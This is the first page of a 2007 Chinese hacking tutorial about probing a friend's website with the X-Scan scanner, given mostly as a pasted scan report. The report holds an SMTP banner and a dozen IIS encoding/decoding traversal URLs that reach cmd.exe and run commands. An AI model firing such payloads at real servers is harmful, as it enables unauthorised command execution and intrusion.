放大镜站内搜索:

您现在的位置:首页 > 电脑 > 应用技巧 > 正文
利用X-Scan找ASP木马后门
学生王国 ∥ http://www.xswg.com 更新时间:2007年1月25日 调整字体:

今天无聊连家都回不去呵呵~~朋友叫测试个站

打开地址一看呆拉!!可能是他故意难我吧打开地址后就这样:

[[[正在建立您想要连接的站点目前没有默认页。可能正在被进行升级。

请稍候再试此站点。假如问题仍然存在,请与 Web 站点管理员联系。 ]]]

呵呵!!

不怕有句老话不会扫描那就不是一个真正的黑客

来该X-Scan上场
****.**.**.**

扫描结果如下:

X-Scan 检测报告
------------------

检测结果

- 存活主机 : 1
- 漏洞数量 : 22
- 警告数量 : 16
- 提示数量 : 6

主机列表

****.**.**.** (发现安全漏洞)
. OS: Windows; PORT/TCP: 21, 25, 53, 80, 443


详细资料

****.**.**.** :
. 开放端口列表 :
o smtp (25/tcp) (发现安全警告)
o domain (53/tcp) (发现安全提示)
o www (80/tcp) (发现安全漏洞)
o https (443/tcp) (发现安全提示)
o ftp (21/tcp) (发现安全提示)

. 端口"smtp (25/tcp)"发现安全警告 :

SMTP服务器不支持用户身份验证,允许匿名用户使用


. 端口"smtp (25/tcp)"发现安全提示 :


A SMTP server is running on this port
Here is its banner :
220 altsyz-web Microsoft ESMTP MAIL Service, Version: 5.0.2195.2966 ready at
Wed, 20 Oct 2004 06:28:38 +0800
NESSUS_ID : 10330

. 端口"domain (53/tcp)"发现安全提示 :


Maybe the "domain" service running on this port.

NESSUS_ID : 10330

. 端口"www (80/tcp)"发现安全漏洞 :
IIS编码/解码漏洞:
http://****.**.**.**/scripts/..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir


. 端口"www (80/tcp)"发现安全漏洞 :

IIS编码/解码漏洞:
http://****.**.**.**/scripts/..%%35c..%%35cwinnt/system32/cmd.exe?/c+di
. 端口"www (80/tcp)"发现安全漏洞 :


IIS编码/解码漏洞:
http://****.**.**.**/scripts/..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir

. 端口"www (80/tcp)"发现安全漏洞 :


IIS编码/解码漏洞:
http://****.**.**.**/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir


. 端口"www (80/tcp)"发现安全漏洞 :


IIS编码/解码漏洞:
http://****.**.**.**/scripts/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir


. 端口"www (80/tcp)"发现安全漏洞 :


IIS编码/解码漏洞:
http://****.**.**.**/scripts/..%%35c..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir

. 端口"www (80/tcp)"发现安全漏洞 :


IIS编码/解码漏洞:
http://****.**.**.**/scripts/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir


. 端口"www (80/tcp)"发现安全漏洞 :


IIS编码/解码漏洞:
http://****.**.**.**/scripts/..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir

. 端口"www (80/tcp)"发现安全漏洞 :

IIS编码/解码漏洞:
http://****.**.**.**/scripts/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir

. 端口"www (80/tcp)"发现安全漏洞 :


IIS编码/解码漏洞:
http://****.**.**.**/scripts/..%%35c..%%35c..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir


. 端口"www (80/tcp)"发现安全漏洞 :

IIS编码/解码漏洞:
http://****.**.**.**/scripts/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir

. 端口"www (80/tcp)"发现安全漏洞 :


IIS编码/解码漏洞:
http://****.**.**.**/scripts/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir


. 端口"www (80/tcp)"发现安全漏洞 :


3共  1 2 3 下一页


相关链接
来自:动网先锋
编辑:
浏览:
评论查看全部评论
您的评论
姓名:
请您注意:
1.请遵守《中国互联网行业自律条款》及中华人民共和国其他各项有关法律法规。
2.严禁发表危害国家安全、损害国家利益、破坏民族团结、破坏国家宗教政策、破坏社会稳定、侮辱、诽谤、教唆、淫秽等内容的评论 。
3.用户需对自己在使用本站服务过程中的行为承担法律责任(直接或间接导致的)。
4.本站管理员有权保留或删除评论内容。
评论内容只代表网友个人观点,与本网站立场无关。